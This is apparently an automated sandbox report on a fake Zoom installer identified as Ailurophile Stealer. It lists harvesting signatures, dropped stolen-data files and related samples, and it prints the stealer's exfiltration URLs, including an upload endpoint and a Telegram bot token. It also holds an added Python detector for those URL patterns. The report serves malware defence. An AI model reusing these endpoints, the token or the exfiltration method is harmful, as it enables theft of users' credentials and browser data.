    • Signatures: Installs new ROOT certificates; Tries to harvest and steal browser information (history, passwords, etc); Detected generic credential text file
    • Started processes: powershell.exe (15), powershell.exe (15), powershell.exe (11), 6 other processes

    Child processes:
    • Each of the three powershell.exe instances started a conhost.exe
    • The 6 other processes started three conhost.exe instances and 3 other processes

    Source | Detection | Scanner | Label | Link
    ZoomInstaller.exe | 0% | ReversingLabs | - | -
    ZoomInstaller.exe | 100% | Joe Sandbox ML | - | -
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe | -
    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | -
    https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe | -
    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | -
    https://go.micro | 0% | URL Reputation | safe | -
    https://contoso.com/License | 0% | URL Reputation | safe | -
    https://contoso.com/Icon | 0% | URL Reputation | safe | -
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe | -
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | -
    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | -
    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | -
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | -
    https://contoso.com/ | 0% | URL Reputation | safe | -
    https://nuget.org/nuget.exe | 0% | URL Reputation | safe | -
    https://oneget.orgX | 0% | URL Reputation | safe | -
    https://aka.ms/pscore68 | 0% | URL Reputation | safe | -
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | -
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe | -
    https://oneget.org | 0% | URL Reputation | safe | -
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    api.myip.com | 104.26.9.59 | true | false | - | unknown
    manestvli.shop | 188.114.97.3 | true | true | - | unknown
    api.telegram.org | 149.154.167.220 | true | true | - | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://api.myip.com/ | false | - | unknown
    https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage | false | - | unknown
    https://manestvli.shop/upload.php?data=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&hash=2d6441c1bfc749b0344f | true | - | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://duckduckgo.com/chrome_newtab | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    http://nuget.org/NuGet.exe | powershell.exe, 00000011.00000002.2563414828.00000160AE9C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2548489987.00000160A0157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2563414828.00000160AE880000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F34AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F43272000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
    https://api.myip.com | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000102000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://duckduckgo.com/ac/?q= | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | - | unknown
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
    https://go.micro | powershell.exe, 00000011.00000002.2548489987.000001609FA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F3427B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://contoso.com/License | powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://manestvli.shop/upload.php? | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001CA000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://contoso.com/Icon | powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://api.telegram.org/bot%s/sendMessage | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00000E000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://www.ecosia.org/newtab/ | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://github.com/Pester/Pester | powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
    https://manestvli.shop/upload.php?https://manestvli.shop/upload.php? | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001CA000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://ac.ecosia.org/autocomplete?q= | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000078000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125 | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00000E000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://ailurophilestealer.com/bot | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000212000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://contoso.com/ | powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://nuget.org/nuget.exe | powershell.exe, 00000011.00000002.2563414828.00000160AE9C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2548489987.00000160A0157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2563414828.00000160AE880000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F34AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F43272000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://oneget.orgX | powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://api.myip.comhttps://api.myip.comHTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyNO_PROXYno_proxyGe | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000102000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://aka.ms/pscore68 | powershell.exe, 00000011.00000002.2548489987.000001609E811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F330C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000011.00000002.2548489987.000001609E811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F330C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessageCookies | ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000410000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
    https://oneget.org | powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://ailurophilestealer.com | ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000068000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001A4000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.dr | false | - |
                                            unknown
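The memory strings above carry the two network behaviours that matter for detection: a Telegram Bot API call of the form /bot<id>:<secret>/sendMessage (exfiltration over a legitimate service, which is why the report's malicious flag and reputation lookups say nothing about it) and an external-IP lookup against api.myip.com. The following scanner is an added example, not code from the Joe Sandbox report or from the stealer; it runs over memory-dump strings or TLS-inspected proxy URLs, classifies them against the hosts observed in this report, and replaces the bot secret with a hash so the IOC can be shared without the token. The sample input is constructed and the bot token in it is a placeholder of the same shape as the real one, not the token from the sample.

```python
import hashlib
import re
from dataclasses import dataclass

# A hostname ends at end-of-string, at a non-hostname character, or where a second
# URL is glued on: memory strings are often concatenated, as in the report's
# "https://api.myip.comhttps://api.myip.com..." entry.
_HOST_END = r"(?=$|[^A-Za-z0-9.-]|https?://)"
URL_RE = re.compile(
    r"https?://(?P<host>(?:[A-Za-z0-9-]+?\.)+?[A-Za-z]{2,63}?)" + _HOST_END
    + r"(?P<path>/[^\s\"'<>]*)?"
)
# Telegram Bot API request path: /bot<numeric id>:<35-char secret>/<method>
TELEGRAM_BOT_RE = re.compile(
    r"^/bot(?P<bot_id>\d{6,12}):(?P<secret>[A-Za-z0-9_-]{35})/(?P<method>[A-Za-z]+)"
)

EXTERNAL_IP_LOOKUP = {"api.myip.com"}                                # observed in the report
REPORT_IOC_DOMAINS = {"ailurophilestealer.com", "manestvli.shop"}  # observed in the report


@dataclass(frozen=True)
class Hit:
    line_no: int
    kind: str
    host: str
    detail: str


def token_fingerprint(secret: str) -> str:
    """Short SHA-256 prefix: lets the bot token be shared as an IOC without the secret."""
    return hashlib.sha256(secret.encode()).hexdigest()[:16]


def classify(host: str, path: str):
    """Return (kind, detail) for a URL worth reporting, or None for anything else."""
    if host == "api.telegram.org":
        m = TELEGRAM_BOT_RE.match(path)
        if m:
            detail = (f"bot_id={m['bot_id']} method={m['method']} "
                      f"token_fp={token_fingerprint(m['secret'])}")
            return "telegram_bot_api", detail
        return "telegram_api", path
    if host in EXTERNAL_IP_LOOKUP:
        return "external_ip_lookup", path
    if host in REPORT_IOC_DOMAINS:
        return "report_ioc", path
    return None


def scan(lines):
    """Scan strings (memory-dump strings, TLS-inspected proxy URLs) and return Hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in URL_RE.finditer(line):
            host = m["host"].lower()
            verdict = classify(host, m["path"] or "")
            if verdict is not None:
                hits.append(Hit(n, verdict[0], host, verdict[1]))
    return hits


# Constructed input modelled on the report's memory strings. The bot token is a
# placeholder of the same shape as the real one, not the token from the sample.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot1234567890:" + "A" * 35 + "/sendMessage",
    "https://api.myip.comhttps://api.myip.comHTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxy",
    "https://nuget.org/nuget.exe",
    "https://ailurophilestealer.com",
    "https://cdn.ecosia.org/assets/images/ico/favicon.ico",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_STRINGS):
        print(hit)
```

On the wire the Bot API is plain HTTPS to api.telegram.org, so a proxy or NetFlow sensor only sees the host; the /bot<id>:<secret>/ path shape is visible in process memory, in sandbox string dumps such as this one, or behind TLS inspection. Blocking api.telegram.org outright breaks legitimate use, which is why the host is paired here with the path pattern and with the external-IP lookup that stealers typically make first.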
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
104.26.9.59 | api.myip.com | United States | 13335 | CLOUDFLARENETUS | false
188.114.97.3 | manestvli.shop | European Union | 13335 | CLOUDFLARENETUS | true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1544493
                                            Start date and time:2024-10-29 14:08:21 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Run name:Run with higher sleep bypass
Number of new started processes analysed:22
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:ZoomInstaller.exe
                                            Detection:MAL
                                            Classification:mal76.troj.spyw.evad.winEXE@28/27@4/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 2
                                            • Number of non-executed functions: 3
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                            • Stop behavior analysis, all processes terminated
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: ZoomInstaller.exe
                                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | https://u.to/Ipn6IA | malicious | Unknown | -
149.154.167.220 | Documentos.exe | malicious | Snake Keylogger | -
149.154.167.220 | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | rShippingDocuments240384.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | M2AB8BeHc4.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | Proforma-Invoice#018879TT0100..doc | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | swift-copy31072024PDF.html | malicious | HTMLPhisher | -
149.154.167.220 | Fedex.exe | malicious | AgentTesla | -
149.154.167.220 | come.exe | malicious | MassLogger RAT, PureLog Stealer | -
104.26.9.59 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer | -
104.26.9.59 | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar | -
104.26.9.59 | iBO7gzlZr3.exe | malicious | LummaC | -
104.26.9.59 | 5zFCjSBLvw.exe | malicious | LummaC, Go Injector, LummaC Stealer | -
104.26.9.59 | FySc2FzpA8.exe | malicious | Go Injector | -
104.26.9.59 | setup.exe | malicious | LummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, Vidar | -
104.26.9.59 | 1719859269.0326595_setup.exe | malicious | LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig | -
104.26.9.59 | SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exe | malicious | PureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRAT | -
104.26.9.59 | SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRAT | -
188.114.97.3 | rPO-000172483.exe | malicious | FormBook | www.launchdreamidea.xyz/2b9b/
188.114.97.3 | rPO_28102400.exe | malicious | Lokibot | ghcopz.shop/ClarkB/PWS/fre.php
188.114.97.3 | PbfYaIvR5B.exe | malicious | DCRat, PureLog Stealer, zgRAT | windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
188.114.97.3 | SR3JZpolPo.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
188.114.97.3 | 5Z1WFRMTOXRH6X21Z8NU8.exe | malicious | Unknown | artvisions-autoinsider.com/8bkjdSdfjCe/index.php
188.114.97.3 | PO 4800040256.exe | malicious | FormBook | www.cc101.pro/4hfb/
188.114.97.3 | QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/cDXpxO66/download
188.114.97.3 | Instruction_1928.pdf.lnk.download.lnk | malicious | LummaC | tech-tribune.shop/pLQvfD4d5/index.php
188.114.97.3 | WBCDZ4Z3M2667YBDZ5K4.bin.exe | malicious | Unknown | tech-tribune.shop/pLQvfD4d5/index.php
188.114.97.3 | yGktPvplJn.exe | malicious | Pushdo | www.rs-ag.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.myip.com | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer | 104.26.9.59
api.myip.com | gHPYUEh253.exe | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | 104.26.8.59
api.myip.com | kqS23MOytx.exe | malicious | Socks5Systemz, Stealc, Vidar, XWorm, Xmrig | 172.67.75.163
api.myip.com | Z66MsXpleT.exe | malicious | LummaC, Stealc, Vidar | 172.67.75.163
api.myip.com | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar | 104.26.9.59
api.myip.com | iBO7gzlZr3.exe | malicious | LummaC | 104.26.9.59
api.myip.com | 7CTH165fQv.exe | malicious | Latrodectus | 104.26.8.59
api.myip.com | 3QKcKCEzYP.exe | malicious | LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC | 172.67.75.163
api.myip.com | 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe | malicious | Amadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, Vidar | 104.26.8.59
api.telegram.org | https://u.to/Ipn6IA | malicious | Unknown | 149.154.167.220
api.telegram.org | Documentos.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | rShippingDocuments240384.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | M2AB8BeHc4.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Proforma-Invoice#018879TT0100..doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | swift-copy31072024PDF.html | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | Fedex.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | come.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | https://u.to/Ipn6IA | malicious | Unknown | 149.154.167.220
TELEGRAMRU | Documentos.exe | malicious | Snake Keylogger | 149.154.167.220
TELEGRAMRU | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | rShippingDocuments240384.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | M2AB8BeHc4.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Proforma-Invoice#018879TT0100..doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | swift-copy31072024PDF.html | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | Fedex.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | come.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
CLOUDFLARENETUS | https://u.to/Ipn6IA | malicious | Unknown | 104.21.233.198
CLOUDFLARENETUS | Documentos.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | PAGO FRAS PENDIENTES.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6 | malicious | Mamba2FA | 104.17.25.14
CLOUDFLARENETUS | rPO-000172483.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 188.114.96.3
                                                                                No context
                                                                                No context
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                Category:dropped
                                                                                Size (bytes):3541
                                                                                Entropy (8bit):5.935786559558992
                                                                                Encrypted:false
                                                                                SSDEEP:96:R166vt4lO3ya5+1JuV+1DeRPsUJRUu1Sm:BMO3R+LDexbRem
                                                                                MD5:2912FC24DB5466479288AC785DBDE17F
                                                                                SHA1:866E51E9E6199B5E9CBB48EFB7D23A023B7B0F09
                                                                                SHA-256:669C7EA5AEF59B759B7ECE5A0D5DB455C4DEFE1105A5EFFE963C349F6696F7BE
                                                                                SHA-512:CD9DCFE70A5757AA853DEAD1C338019D8CDB59063D5E4750C641A13936955D8D1AF9E5EE9C3B56D1F101C4A1956042CC1E734C0FD71952E6B0DD34BF21714B5A
                                                                                Malicious:false
                                                                                Preview:PK............................Ailurophile/PK............................Ailurophile\Autofills/PK........................#...Ailurophile\Autofills\Autofills.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP.....XZ.....S..._....._............X.S.......PK..G...S...V...PK............................Ailurophile\Cards/PK............................Ailurophile\Cards\Cards.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP......X.R..._........PK...@.`;...>...PK............................Ailurophile\Cookies/PK........................&...Ailurophile\Cookies\Google_Default.txt..Mr.0...u8....PP.Lg...EdBR...1.$......o.y.x..j.....I..1.........].&..`...#...`.I.,.....v@.[..4..e.M.:...P..krj^M.tw.R.KyK.mH.u.H%....q_......a.....X{}-c...x....4..c6feq=......q.[l.%..w..4...!....)Wp.9.....;E.s......[......aB...t4.'....PK...A.....C...PK............................Ailurophile\History/PK........................&...Ailurophile\History\Google-Default.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP.......Y\._T.
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):86
                                                                                Entropy (8bit):4.332226354824286
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3rbEKcJW5KeBF3R3AV:ziJi4wEJObEKcY5JFh3AV
                                                                                MD5:6617FAF8F3D5A4BAB9ED7E6D6D81E9AC
                                                                                SHA1:47C5D229C3D06A26D685B7C3357C9AA1951ED676
                                                                                SHA-256:3D87146BA69810E07CAD4BD64C1731D41A2359E5D97E47115CA467784FCFC7EB
                                                                                SHA-512:452F926F36BE843D2B76CDD7079B058986620419BB093B563AB17435B95B05D865B6903124723B2C9A60A04114EDE43CA6DEB2694AB7CCBCE4BF831B590855FE
                                                                                Malicious:true
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No autofills found for Google Default.
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):62
                                                                                Entropy (8bit):4.411474689552285
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3rZrln:ziJi4wEJOZZn
                                                                                MD5:7166946D592DA0325381A8F84248F7C7
                                                                                SHA1:5DEF442E33A3A6A1890C12055A000D5014E86CB8
                                                                                SHA-256:905E8F268FF0D5C67976E0AB04DCB91BB61A9495FB6E9E840B1CA7A962FA0D72
                                                                                SHA-512:FE482A1AE8F524823D522B95CE1393061328C4DD202A657D5CCFBD79FD326D7B3D504B7505D4C6F042089063CBA3E4F65468B579B93CBEC562BCB7EC402A0D08
                                                                                Malicious:true
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No cards found
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):323
                                                                                Entropy (8bit):5.909071500110722
                                                                                Encrypted:false
                                                                                SSDEEP:6:ziJi4wEJCk3rocHDKJlSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISslZk3rocHDyzxP:OJ1wEJCk79mlDuyXv3RdJqmOvO60lZkU
                                                                                MD5:C4417D2378E5C5DAA838C0B7F1721C5B
                                                                                SHA1:F294F974358E823DC19EE28CCA32D2F87C4AE010
                                                                                SHA-256:F9FC9FC04186CADE3470ABBF3B8868507AFB0E30D82AF90919CF3955D8902D95
                                                                                SHA-512:8D609E660616D454EBA937CD059742FEEA59734FDF356EC802DC64CCE81768018B8B8913F441A5B739E3FE1EAA621345306B5051F54CD9CBBA519BC9666CCE42
                                                                                Malicious:true
